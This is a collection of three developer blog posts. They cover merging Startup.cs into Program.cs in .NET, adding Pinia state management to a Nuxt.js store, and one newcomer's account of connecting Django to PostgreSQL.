The Old Way: Separate Startup.cs and Program.cs ### Original Program.cs ```csharp using Microsoft.Extensions.Configuration.AzureAppConfiguration; using Microsoft.Extensions.Logging.ApplicationInsights; using System.Diagnostics; public class Program { public static void Main(string[] args) { try { Debug.WriteLine("Configure infrastructure..."); BuildHost(args).Run(); } catch (Exception ex) { Debug.WriteLine($"Infrastructure configuration failed: {ex}"); } } public static IHost BuildHost(string[] args) { // Configuration and host building logic } } ``` ### Original Startup.cs ```csharp using Microsoft.AspNetCore.Http.Features; using Microsoft.EntityFrameworkCore; using Microsoft.Extensions.Options; using Microsoft.FeatureManagement; using System.Diagnostics; public class Startup { public Startup(IConfiguration configuration, IWebHostEnvironment webHostEnvironment) { Configuration = configuration; WebHostEnvironment = webHostEnvironment; } public IConfiguration Configuration { get; } public IWebHostEnvironment WebHostEnvironment { get; } // Methods for configuring services and middleware } ``` ## The New Combined Mode ### Combined Program.cs ```csharp using Microsoft.AspNetCore.Http.Features; using Microsoft.EntityFrameworkCore; using Microsoft.Extensions.Configuration.AzureAppConfiguration; using Microsoft.Extensions.Logging; using Microsoft.Extensions.Logging.ApplicationInsights; using Microsoft.FeatureManagement; using Newtonsoft.Json.Converters; using System.Diagnostics; var builder = WebApplication.CreateBuilder(args); // Configuration setup // Using builder.Configuration to setup configuration sources builder.Configuration.AddAzureAppConfiguration(options => { options.UseFeatureFlags(o => { o.Label = "InstanceName"; // Replace with your instance name o.CacheExpirationInterval = TimeSpan.FromMinutes(10); }); options.ConfigureKeyVault(o => { o.SetCredential(new DefaultAzureCredential()); // Replace with your Azure credential o.SetSecretRefreshInterval(TimeSpan.FromMinutes(30)); }); options.Connect("YourAppConfigurationEndpoint", new DefaultAzureCredential()) // Replace with your endpoint and credential .ConfigureRefresh(o => { o.Register("Settings:Sentinel", refreshAll: true) .SetCacheExpiration(TimeSpan.FromMinutes(10)); }) .Select(KeyFilter.Any, LabelFilter.Null) .Select(KeyFilter.Any, labelFilter: "InstanceName"); // Replace with your instance name }); if (builder.Environment.IsDevelopment()) { builder.Configuration.AddJsonFile("appsettings.json", optional: true); builder.Configuration.AddUserSecrets<Program>(); } builder.Configuration.AddEnvironmentVariables(); // Logging setup // Using builder.Logging to setup logging providers builder.Logging.ClearProviders(); // Clear default providers builder.Logging.AddConsole(); // Add console logging builder.Logging.AddDebug(); // Add debug logging builder.Logging.AddAzureWebAppDiagnostics(); // Add Azure diagnostics if (!builder.Environment.IsDevelopment() && Environment.GetEnvironmentVariable("AUTOMATED_TESTING") is null) { builder.Logging.AddApplicationInsights(config => { config.ConnectionString = builder.Configuration["APPLICATIONINSIGHTS_CONNECTION_STRING"]; config.DisableTelemetry = false; }, options => options.IncludeScopes = false); } // Services setup var services = builder.Services; services.AddControllers().AddNewtonsoftJson(opt => opt.SerializerSettings.Converters.Add(new StringEnumConverter())); services.AddDbContext<YourDbContext>(options => options.UseSqlServer(builder.Configuration.GetConnectionString("DefaultConnection"))); services.AddFeatureManagement(); services.AddAzureAppConfiguration(); // Register other services as needed // Middleware setup var app = builder.Build(); app.UseRouting(); app.UseAuthentication(); app.UseAuthorization(); app.MapControllers(); app.Run(); // Utility methods for retrieving services private static T GetService<T>(IServiceCollection services) { ServiceProvider serviceProvider = services.BuildServiceProvider(); return serviceProvider.GetService<T>() ?? throw new Exception($"Could not find service {typeof(T)}"); } private static T GetService<T>(IApplicationBuilder app) { return app.ApplicationServices.GetService<T>() ?? throw new Exception($"Could not find service {typeof(T)}"); } private static void DebugWrite(string message) { Console.WriteLine(message); Debug.WriteLine(message); } ``` ### Key Points in the Combined File - **Configuration**: Configuration sources are added using `builder.Configuration`. This includes Azure App Configuration, JSON files, user secrets, and environment variables. - **Logging**: Logging is set up using `builder.Logging` with different providers for console, debug, and Application Insights. The `builder.Logging` API simplifies logging configuration by providing a centralized way to add and configure logging providers. - **Services**: All service configurations, including custom services, middleware, and feature management, are consolidated. Using `builder.Services` makes it straightforward to register services with the dependency injection container. - **Middleware**: Middleware components are configured in one place, improving readability and maintainability. The `app.UseRouting()`, `app.UseAuthentication()`, and `app.UseAuthorization()` methods set up the middleware pipeline. ### Our Experience and story In our project, we have more than 100 active production instances, each with unique configuration and settings. We faced numerous conditions for integration tests, such as checking `Environment.GetEnvironmentVariable("AUTOMATED_TESTING")` or custom feature flag conditions based on license. All those conditions determine whether the application should use a different database or configure other testing-specific settings. And managing these conditions across multiple files was a pain in the a. Since merging `Startup.cs` and `Program.cs`, we have gained a much nicer overview and more control over our application. The centralized configuration has made it significantly easier to maintain and extend our application, particularly when writing and running integration tests and switching custom features. ### Conclusion Merging `Startup.cs` and `Program.cs` can streamline your .NET applications, making them easier to test and maintain. However, be cautious during the transition to avoid introducing bugs. Start by merging the files as they are before making any improvements. This way, if something goes wrong, you'll have an easier time debugging (trust me, it happened to me...). By following the steps and best practices outlined in this article, you can take advantage of the modern .NET hosting model and simplify your application's setup.
manhhungtran
1,909,004
Implementing Pinia for Efficient State Management in Nuxt.js Online Stores
Check this post in my web notes! In this article, we will talk about the Pinia store for Nuxt.js...
27,540
2024-07-02T13:35:12
https://webcraft-notes.com/blog/implementing-pinia-for-efficient-state-management-in
nuxt, vue, javascript, tutorial
![Implementing Pinia for Efficient State Management in Nuxt.js Online Stores](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2n8fz6dzc5ere8729vfv.png) > Check [this post](https://webcraft-notes.com/blog/implementing-pinia-for-efficient-state-management-in) in [my web notes](https://webcraft-notes.com/blog/)! In this article, we will talk about the [Pinia](https://pinia.vuejs.org/) store for Nuxt.js projects. We already built the [main pages](https://webcraft-notes.com/blog/constructing-key-pages-for-your-ecommerce-site) for our e-commerce store and are ready to populate our project with functionality, but first, we need to configure the state management system. Why? Because we want to store our e-commerce data and part of its functionality in a state management system so that it would be available from each component where we will need it. I think Pinia is the best variant for this purpose. Additionally, you can check [this Pinia guide](https://webcraft-notes.com/blog/vuejs-state-management-guide-pinia-in-practice), or let's just walk through it together. 1. Installing and Configuring Pinia in Nuxt.js Project 2. Creating the First Pinia Store With the importance of state management established, let's dive into the practical implementation of Pinia in our Nuxt.js e-commerce project. We'll start by: ## 1. Installing and Configuring Pinia in Nuxt.js Project We will use the official documentation which recommends using the "npm install pinia" command for Vue.js projects, but we need to move to the Nuxt.js section, and there is a special package for Nuxt.js [over here](https://pinia.vuejs.org/ssr/nuxt.html). According to Pinia documentation, we need to use the command: "npm install pinia @pinia/nuxt". Then we need to open the nuxt.config.js file in the project root directory and add the @pinia/nuxt module. ``` export default defineNuxtConfig({ devtools: { enabled: false }, modules: [ '@pinia/nuxt', ], }) ``` Great, we have a Pinia state management system in our e-commerce store, next let's figure out how to create and use it. ## 2. Creating the First Pinia Store We will create a new "store" folder in the root of our project, and inside that folder create a base.js file, this file will be our first storage and we will store over there our main data that needs to be available everywhere like modal and notification status or window width. Next, we need to use the "defineStore" function to create a new store, and inside the defineStore function, we will pass an object as a parameter. That object will contain id as a unique store name, state as a callback function that will return stored values, actions as an object that will contain functions that can mutate stored values, and getters as an object that gives us access to our values. In some cases, we will need the device window width which is why I suggest creating such a value in our first store. We will add "windowWidth" as our store value, "aWindowWidth" as our first action that will update "windowWidth", and "gWindowWidth" as our first getter that will return the "windowWidth" value. ``` import { defineStore } from 'pinia'; export const useBaseStore = defineStore({ id: 'base', state: () => ({ windowWidth: 1200 }), actions: { aWindowWidth(payload) { this.windowWidth = payload; }, }, getters: { gWindowWidth() { return this.windowWidth; } } }) ``` Now we will import the "base" store into the app.vue file and add a new event listener that will call action and update the "windowWidth" value. Also, do not forget to remove that event listener before leaving. ``` <script> import { useBaseStore } from "./store/base"; export default { name: "App", computed: { baseStore() { return useBaseStore(); } }, methods: { updateWindowWidth() { this.baseStore.aWindowWidth(window.innerWidth); console.log(this.baseStore.gWindowWidth); } }, mounted() { this.updateWindowWidth(); window.addEventListener('resize', this.updateWindowWidth); }, unmounted() { window.removeEventListener('resize', this.updateWindowWidth); }, } </script> ``` Let's rebuild our project and check the result. ![Nuxt js implementing Pinia](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/at4lhkvn9zxeh8toidvm.png) Okay, looks great, we have a window width value and confirmation that our store was implemented successfully. We have successfully established Pinia and launched our first store, laying the groundwork for effective state management in our Nuxt.js e-commerce platform. We'll go deeper into Pinia's features in the next articles and build extra stores to handle different parts of our e-commerce platform, such as product filtering or cart management. The best variant to study something is to make it by your own, the same thing works with coding, but if you need a source code for this tutorial you can get it [here](https://buymeacoffee.com/webcraft.notes/e/257947).
webcraft-notes
1,909,003
Journey to Backend Development
Having been a frontend developer for years, transitioning to backend development was a bit of a...
0
2024-07-02T13:35:03
https://dev.to/nifilat/journey-to-backend-development-4pla
Having been a frontend developer for years, transitioning to backend development was a bit of a struggle, but a fun one. I started my journey in tech by learning Python, and it always stuck with me. That's why there was no surprise when I decided to choose Django as the backend framework I wanted to learn. Starting off, connecting to a database was a challenge for me. It was not easy to make a connection between my Django application and a database during a project I recently worked on. This problem hindered the development process and put the whole application in danger. In this task, I had to create a link connecting Django and PostgreSQL (it had to be done so that data could be fetched out of the storage as well as written in it). ## **Step-by-Step Solution** **Step 1: Identifying the Problem** I examined the error logs and found that connection timeouts were frequent when the application attempted to connect to the database. It meant there was a potential problem with either the database server or the connection string. **Step 2: Setting Up PostgreSQL** I made sure that PostgreSQL was installed and running properly. I used the commands below on my local machine to verify the status and start PostgreSQL service: `sudo service postgresql status sudo service postgresql start ` **Step 3: Configuring Django Settings** I then made changes to settings.py in my Django project to set up the correct configuration of the database. This is in the folder named after your project under the main directory of the project. There was also some settings in the form of the database name along with the user, the address of the database server (host) as well as the port number if any. The following is part of the amended settings.py file: ``` DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'mydatabase', 'USER': 'oluwanifemi', 'PASSWORD': 'password', 'HOST': 'localhost', 'PORT': '5432', } } ``` **Step 4: Installing psycopg2** To enable Django to communicate with PostgreSQL, I needed to install the psycopg2 library, which is the PostgreSQL adapter for Python and it was done using pip. **Step 5: Applying Migrations** With the database configuration set up, I applied the migrations to create the necessary database tables. **Step 6: Testing the Connection** To verify that the connection was successful, I created a simple view in Django to interact with the database. I added a new entry to one of the models and retrieved it to ensure data was being stored and fetched correctly. I enjoyed solving the back-end challenge because it helped me understand that being persistent in my learning process is paramount. That's why I believe that I should move forward with learning through the HNG internship. As such, I feel excited to solve harder puzzles as well as work with experienced developers and those who resemble me in their reasoning practices for lifelong learning. Through the HNG Internship program, my growth potential is limitless due to the opportunity it provides in terms of access to various mentors, enabling me to sharpen these skills in backend development. I encourage anyone interested in enhancing their technical skills to explore the HNG internship program. You can learn more about the program [here](https://hng.tech/internship) and you can also apply for the premium feature [here](https://hng.tech/premium).
nifilat